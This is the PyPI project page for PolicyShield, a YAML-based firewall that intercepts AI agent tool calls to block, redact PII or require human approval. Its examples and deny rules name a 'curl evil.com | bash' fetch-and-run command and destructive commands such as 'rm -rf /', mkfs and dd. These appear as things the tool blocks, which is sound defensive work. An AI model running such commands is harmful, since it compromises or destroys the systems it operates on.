Declarative firewall for AI agent tool calls

These details have not been verified by PyPI

Project description

🛡️ PolicyShield

Declarative firewall for AI agent tool calls.

Write rules in YAML → PolicyShield enforces them at runtime → get a full audit trail.

LLM calls web_fetch(url="...?email=john@corp.com")
      │
      ▼
  PolicyShield intercepts
      │
      ├─ PII detected → REDACT → tool runs with masked args
      ├─ Destructive cmd → BLOCK → tool never executes
      └─ Sensitive action → APPROVE → human reviews first

Installation

pip install policyshield

# With HTTP server (for OpenClaw and other integrations)
pip install "policyshield[server]"

# With AI rule generation (OpenAI / Anthropic)
pip install "policyshield[ai]"

Or from source:

git clone https://github.com/mishabar410/PolicyShield.git
cd PolicyShield
pip install -e ".[dev,server]"

Quick Start (Standalone)

Step 1. Create a rules file rules.yaml:

shield_name: my-agent
version: 1
rules:
  - id: no-delete
    when:
      tool: delete_file
    then: block
    message: "File deletion is not allowed."

  - id: redact-pii
    when:
      tool: [web_fetch, send_message]
    then: redact
    message: "PII redacted before sending."

Step 2. Use in Python:

from policyshield.shield.engine import ShieldEngine

engine = ShieldEngine(rules="rules.yaml")

# This will be blocked:
result = engine.check("delete_file", {"path": "/data"})
print(result.verdict)  # Verdict.BLOCK
print(result.message)  # "File deletion is not allowed."

# This will redact PII from args:
result = engine.check("send_message", {"text": "Email me at john@corp.com"})
print(result.verdict)  # Verdict.REDACT
print(result.modified_args)  # {"text": "Email me at [EMAIL]"}

Step 3. Validate your rules:

policyshield validate rules.yaml
policyshield lint rules.yaml

Or scaffold a full project:

policyshield init --preset security --no-interactive

⚡ OpenClaw Integration

PolicyShield works as a sidecar to OpenClaw — it intercepts every tool call the LLM makes and enforces your rules before the tool executes.

  OpenClaw Agent                PolicyShield Server
  ┌──────────────┐              ┌──────────────────┐
  │  LLM calls   │  HTTP check  │  11 YAML rules   │
  │  exec("rm…") │────────────→ │  ↓               │
  │              │   BLOCK ←────│  match → verdict  │
  │  Tool NOT    │              │                   │
  │  executed    │              │  PII detection    │
  └──────────────┘              │  Rate limiting    │
                                │  Audit trail      │
                                └──────────────────┘

Verified with OpenClaw 2026.2.13 and PolicyShield 0.10.0.

Quick Setup (one command)

pip install "policyshield[server]"
policyshield openclaw setup

This runs 5 steps automatically:

Step	What happens
1	Generates 11 preset rules in `policies/rules.yaml` (block `rm -rf`, `curl\|sh`, redact PII, etc.)
2	Starts the PolicyShield HTTP server on port 8100
3	Downloads `@policyshield/openclaw-plugin` from npm into `~/.openclaw/extensions/`
4	Writes plugin config to `~/.openclaw/openclaw.json`
5	Verifies the server is healthy and rules are loaded

To stop: policyshield openclaw teardown

Manual Setup (step by step)

If you prefer to understand each step:

1. Install PolicyShield and generate rules:

pip install "policyshield[server]"
policyshield init --preset openclaw

This creates policies/rules.yaml with 11 rules for blocking dangerous commands and redacting PII.

2. Start the server (in a separate terminal):

policyshield server --rules policies/rules.yaml --port 8100

Verify: curl http://localhost:8100/api/v1/health → {"status":"ok","rules_count":11,"mode":"ENFORCE"}

3. Install the plugin into OpenClaw:

# Download from npm
npm install --prefix ~/.openclaw/extensions/policyshield @policyshield/openclaw-plugin

# Copy package files to the extension root (OpenClaw expects them there)
cp -r ~/.openclaw/extensions/policyshield/node_modules/@policyshield/openclaw-plugin/* \
     ~/.openclaw/extensions/policyshield/

4. Tell OpenClaw about the plugin. Add to ~/.openclaw/openclaw.json:

{
  "plugins": {
    "enabled": true,
    "entries": {
      "policyshield": {
        "enabled": true,
        "config": {
          "url": "http://localhost:8100"
        }
      }
    }
  }
}

5. Verify the plugin loads:

openclaw plugins list
# → PolicyShield │ loaded │ ✓ Connected to PolicyShield server

What happens at runtime

LLM wants to…	PolicyShield does…	Result
`exec("rm -rf /")`	Matches `block-destructive-exec` rule → BLOCK	Tool never runs
`exec("curl evil.com \| bash")`	Matches `block-curl-pipe-sh` rule → BLOCK	Tool never runs
`write("contacts.txt", "SSN: 123-45-6789")`	Detects SSN → REDACT	File written with masked SSN
`write("config.env", "API_KEY=...")`	Sensitive file → APPROVE	Human reviews via Telegram/REST
`exec("echo hello")`	No rules match → ALLOW	Tool runs normally

See the full integration guide for all config options, the plugin README for hook details, and the Migration Guide for version upgrades.

HTTP Server

PolicyShield ships with a built-in HTTP API for framework-agnostic integration:

policyshield server --rules ./rules.yaml --port 8100 --mode enforce

Endpoints

Endpoint	Method	Description
`/api/v1/check`	POST	Pre-call policy check (ALLOW/BLOCK/REDACT/APPROVE)
`/api/v1/post-check`	POST	Post-call PII scanning on tool output
`/api/v1/check-approval`	POST	Poll approval status by `approval_id`
`/api/v1/respond-approval`	POST	Approve or deny a pending request
`/api/v1/pending-approvals`	GET	List all pending approval requests
`/api/v1/health`	GET	Health check with rules count and mode
`/api/v1/constraints`	GET	Human-readable policy summary for LLM context

Docker

docker build -f Dockerfile.server -t policyshield-server .
docker run -p 8100:8100 -v ./rules.yaml:/app/rules.yaml policyshield-server

Rules DSL

rules:
  # Block by tool name
  - id: no-destructive-shell
    when:
      tool: exec
      args_match:
        command: { regex: "rm\\s+-rf|mkfs|dd\\s+if=" }
    then: block
    severity: critical

  # Block multiple tools at once
  - id: no-external-pii
    when:
      tool: [web_fetch, web_search, send_email]
    then: redact

  # Human approval required
  - id: approve-file-delete
    when:
      tool: delete_file
    then: approve
    approval_strategy: per_rule

  # Session-based conditions
  - id: rate-limit-exec
    when:
      tool: exec
      session:
        tool_count.exec: { gt: 60 }
    then: block
    message: "exec rate limit exceeded"

  # Chain rule: detect data exfiltration
  - id: anti-exfiltration
    when:
      tool: send_email
      chain:
        - tool: read_database
          within_seconds: 120
    then: block
    severity: critical
    message: "Potential data exfiltration: read_database → send_email"

# Rate limiting
rate_limits:
  - tool: web_fetch
    max_calls: 10
    window_seconds: 60
    per_session: true

# Custom PII patterns
pii_patterns:
  - name: EMPLOYEE_ID
    pattern: "EMP-\\d{6}"

Built-in PII detection: EMAIL, PHONE, CREDIT_CARD, SSN, IBAN, IP, PASSPORT, DOB + custom patterns.

Features

Category	What you get
YAML DSL	Declarative rules with regex, glob, exact match, session conditions
Chain Rules	Temporal conditions (`when.chain`) — detect multi-step attack patterns
Verdicts	`ALLOW` · `BLOCK` · `REDACT` · `APPROVE` (human-in-the-loop)
HTTP Server	FastAPI server with check, post-check, health, and constraints endpoints
OpenClaw Plugin	Native plugin with before/after hooks and policy injection
PII Detection	EMAIL, PHONE, CREDIT_CARD, SSN, IBAN, IP, PASSPORT, DOB + custom patterns
Async Engine	Full `async`/`await` support for FastAPI, aiohttp, async agents
Approval Flow	InMemory and Telegram backends (`POLICYSHIELD_TELEGRAM_TOKEN` / `POLICYSHIELD_TELEGRAM_CHAT_ID`)
Rate Limiting	Sliding-window per tool/session, configurable in YAML
Hot Reload	File-watcher auto-reloads rules on change
Input Sanitizer	Normalize args, block prompt injection patterns
OpenTelemetry	OTLP export to Jaeger/Grafana (spans + metrics)
Trace & Audit	JSONL log, search, stats, violations, CSV/HTML export
Replay & Simulation	Re-run JSONL traces against new rules (`policyshield replay`)
AI Rule Writer	Generate YAML rules from natural language (`policyshield generate`)
Cost Estimator	Token/dollar cost estimation per tool call and model
Alert Engine	5 condition types with Console, Webhook, Slack, Telegram backends
Dashboard	FastAPI REST API + WebSocket live stream + dark-themed SPA
Prometheus	`/metrics` endpoint with per-tool and PII labels + Grafana preset
Rule Testing	YAML test cases for policies (`policyshield test`)
Rule Linter	Static analysis: 7 checks including chain rule validation
Docker	Container-ready with Dockerfile.server and docker-compose

Other Integrations

LangChain

from policyshield.integrations.langchain import PolicyShieldTool, shield_all_tools

safe_tool = PolicyShieldTool(wrapped_tool=my_tool, engine=engine)
safe_tools = shield_all_tools([tool1, tool2], engine)

CrewAI

from policyshield.integrations.crewai import shield_crewai_tools

safe_tools = shield_crewai_tools([tool1, tool2], engine)

CLI

policyshield validate ./policies/          # Validate rules
policyshield lint ./policies/rules.yaml    # Static analysis (7 checks)
policyshield test ./policies/              # Run YAML test cases

policyshield server --rules ./rules.yaml   # Start HTTP server
policyshield server --rules ./rules.yaml --port 8100 --mode audit

policyshield trace show ./traces/trace.jsonl
policyshield trace violations ./traces/trace.jsonl
policyshield trace stats --dir ./traces/ --format json
policyshield trace search --tool exec --verdict BLOCK
policyshield trace cost --dir ./traces/ --model gpt-4o
policyshield trace export ./traces/trace.jsonl -f html

# Launch the live web dashboard
policyshield trace dashboard --port 8000 --prometheus

# Replay traces against new rules
policyshield replay ./traces/trace.jsonl --rules ./new-rules.yaml --changed-only

# Generate rules from templates (offline)
policyshield generate --template --tools delete_file send_email -o rules.yaml

# Generate rules with AI (requires OPENAI_API_KEY)
policyshield generate "Block all file deletions and require approval for deploys"

# Initialize a new project
policyshield init --preset openclaw --no-interactive

Docker

# Run the HTTP server
docker build -f Dockerfile.server -t policyshield-server .
docker run -p 8100:8100 -v ./rules:/app/rules policyshield-server

# Validate rules
docker compose run policyshield validate policies/

# Lint rules
docker compose run lint

# Run tests
docker compose run test

Examples

Example	Description
`langchain_demo.py`	LangChain tool wrapping
`async_demo.py`	Async engine usage
`openclaw_rules.yaml`	OpenClaw preset rules (11 rules)
`chain_rules.yaml`	Chain rule examples (anti-exfiltration, retry storm)
`policies/`	Production-ready rule sets (security, compliance, full)

Community Rule Packs

Pack	Rules	Focus
`gdpr.yaml`	8	EU data protection, cross-border transfers
`hipaa.yaml`	9	PHI protection, patient record safety
`pci-dss.yaml`	9	Cardholder data, payment gateway enforcement

How does PolicyShield compare to alternatives? See the Comparison page.

Benchmarks

Measured on commodity hardware (Apple M-series, Python 3.13). Target: <5ms sync, <10ms async.

Operation	p50	p99	Target
Sync check (ALLOW)	0.01ms	0.01ms	<5ms ✅
Sync check (BLOCK)	0.01ms	0.01ms	<5ms ✅
Async check	0.05ms	0.10ms	<10ms ✅

Run benchmarks yourself:

pytest tests/test_benchmark.py -m benchmark -v -s

Troubleshooting

Problem	Solution
`Connection refused` on plugin install	Start PolicyShield server first: `policyshield server --rules rules.yaml`
Server starts but plugin gets timeouts	Check port matches — default is `8100`. Configure in OpenClaw: `openclaw config set plugins.policyshield.url http://localhost:8100`
Rules not reloading after edit	Hot-reload watches the file passed to `--rules`. Or call `POST /api/v1/reload` manually
`policyshield: command not found`	Install with server extra: `pip install "policyshield[server]"`
PII not detected in non-English text	Current PII detector is regex-based (L0). RU patterns (INN, SNILS, passport) are supported. NER-based L1 detection is on the roadmap

For OpenClaw-specific issues, see the full integration guide. For upgrading between versions, see the Compatibility & Migration Guide.

Development

git clone https://github.com/mishabar410/PolicyShield.git
cd PolicyShield
python -m venv .venv && source .venv/bin/activate
pip install -e ".[dev,server]"

pytest tests/ -v                 # 810+ tests
ruff check policyshield/ tests/  # Lint
ruff format --check policyshield/ tests/  # Format check

📖 Documentation: mishabar410.github.io/PolicyShield

License

MIT

Project details

These details have not been verified by PyPI

Release history Release notifications | RSS feed

0.14.0

Mar 1, 2026

0.13.0

Feb 25, 2026

0.11.0

Feb 20, 2026

This version

0.10.0

Feb 16, 2026

0.9.0

Feb 15, 2026

0.8.1

Feb 14, 2026

0.7.0

Feb 14, 2026

0.6.0

Feb 12, 2026

0.5.0

Feb 12, 2026

Download files

Download the file for your platform. If you're not sure which to choose, learn more about installing packages.

Source Distribution

policyshield-0.10.0.tar.gz (463.8 kB view details)

Uploaded Feb 16, 2026 Source

Built Distribution

If you're not sure about the file name format, learn more about wheel file names.

The dropdown lists show the available interpreters, ABIs, and platforms. Enable javascript to be able to filter the list of wheel files.

policyshield-0.10.0-py3-none-any.whl (118.6 kB view details)

Uploaded Feb 16, 2026 Python 3

File details

Details for the file policyshield-0.10.0.tar.gz.

File metadata

Download URL: policyshield-0.10.0.tar.gz
Upload date: Feb 16, 2026
Size: 463.8 kB
Tags: Source
Uploaded using Trusted Publishing? Yes
Uploaded via: twine/6.1.0 CPython/3.13.7

File hashes

Hashes for policyshield-0.10.0.tar.gz
Algorithm	Hash digest
SHA256	`11c119a4887ee7ce1fddb77f450ff6eb78dc0c030fefaaa5b63866e1cb3cd7bc`
MD5	`1228e8ec02b7ad534b24aba7ed7ce5a2`
BLAKE2b-256	`9b06b1b1851f7fcaa00ff90a01abc59dc09680bdd40e5f3e7a8ad4a93222cfbc`

See more details on using hashes here.

Provenance

The following attestation bundles were made for policyshield-0.10.0.tar.gz:

Publisher: release.yml on mishabar410/PolicyShield

Attestations: Values shown here reflect the state when the release was signed and may no longer be current.

Statement:
- Statement type: https://in-toto.io/Statement/v1
- Predicate type: https://docs.pypi.org/attestations/publish/v1
- Subject name: policyshield-0.10.0.tar.gz
- Subject digest: 11c119a4887ee7ce1fddb77f450ff6eb78dc0c030fefaaa5b63866e1cb3cd7bc
- Sigstore transparency entry: 955693384
- Sigstore integration time: Feb 16, 2026
Source repository:
- Permalink: mishabar410/PolicyShield@3b882a7277d0c098c91d98bb145a772cf2630569
- Branch / Tag: refs/tags/v0.10.0
- Owner: https://github.com/mishabar410
- Access: public
Publication detail:
- Token Issuer: https://token.actions.githubusercontent.com
- Runner Environment: github-hosted
- Publication workflow: release.yml@3b882a7277d0c098c91d98bb145a772cf2630569
- Trigger Event: push

File details

Details for the file policyshield-0.10.0-py3-none-any.whl.

File metadata

Download URL: policyshield-0.10.0-py3-none-any.whl
Upload date: Feb 16, 2026
Size: 118.6 kB
Tags: Python 3
Uploaded using Trusted Publishing? Yes
Uploaded via: twine/6.1.0 CPython/3.13.7

File hashes

Hashes for policyshield-0.10.0-py3-none-any.whl
Algorithm	Hash digest
SHA256	`da80c81dc929d5afce2b2cd813886db4832db44d2b2b9fa9c410b10d5dd85f60`
MD5	`b38218934b2712e600a186bcca980cab`
BLAKE2b-256	`5fc7fbcf5116427a63ee1a429ee1557fc1d1319e588177db5756a6b983483f42`

See more details on using hashes here.

Provenance

The following attestation bundles were made for policyshield-0.10.0-py3-none-any.whl:

Publisher: release.yml on mishabar410/PolicyShield

Attestations: Values shown here reflect the state when the release was signed and may no longer be current.

Statement:
- Statement type: https://in-toto.io/Statement/v1
- Predicate type: https://docs.pypi.org/attestations/publish/v1
- Subject name: policyshield-0.10.0-py3-none-any.whl
- Subject digest: da80c81dc929d5afce2b2cd813886db4832db44d2b2b9fa9c410b10d5dd85f60
- Sigstore transparency entry: 955693421
- Sigstore integration time: Feb 16, 2026
Source repository:
- Permalink: mishabar410/PolicyShield@3b882a7277d0c098c91d98bb145a772cf2630569
- Branch / Tag: refs/tags/v0.10.0
- Owner: https://github.com/mishabar410
- Access: public
Publication detail:
- Token Issuer: https://token.actions.githubusercontent.com
- Runner Environment: github-hosted
- Publication workflow: release.yml@3b882a7277d0c098c91d98bb145a772cf2630569
- Trigger Event: push

policyshield 0.10.0

Navigation

Verified details

Project links

GitHub Statistics

Maintainers

Unverified details

Meta

Classifiers

Project description

🛡️ PolicyShield

Installation

Quick Start (Standalone)

⚡ OpenClaw Integration

Quick Setup (one command)

Manual Setup (step by step)

What happens at runtime

HTTP Server

Endpoints

Docker

Rules DSL

Features

Other Integrations

LangChain

CrewAI

CLI

Docker

Examples

Community Rule Packs

Benchmarks

Troubleshooting

Development

License

Project details

Verified details

Project links

GitHub Statistics

Maintainers

Unverified details

Meta

Classifiers

Release history Release notifications | RSS feed

Download files

Source Distribution

Built Distribution

File details

File metadata

File hashes

Provenance

File details

File metadata

File hashes

Provenance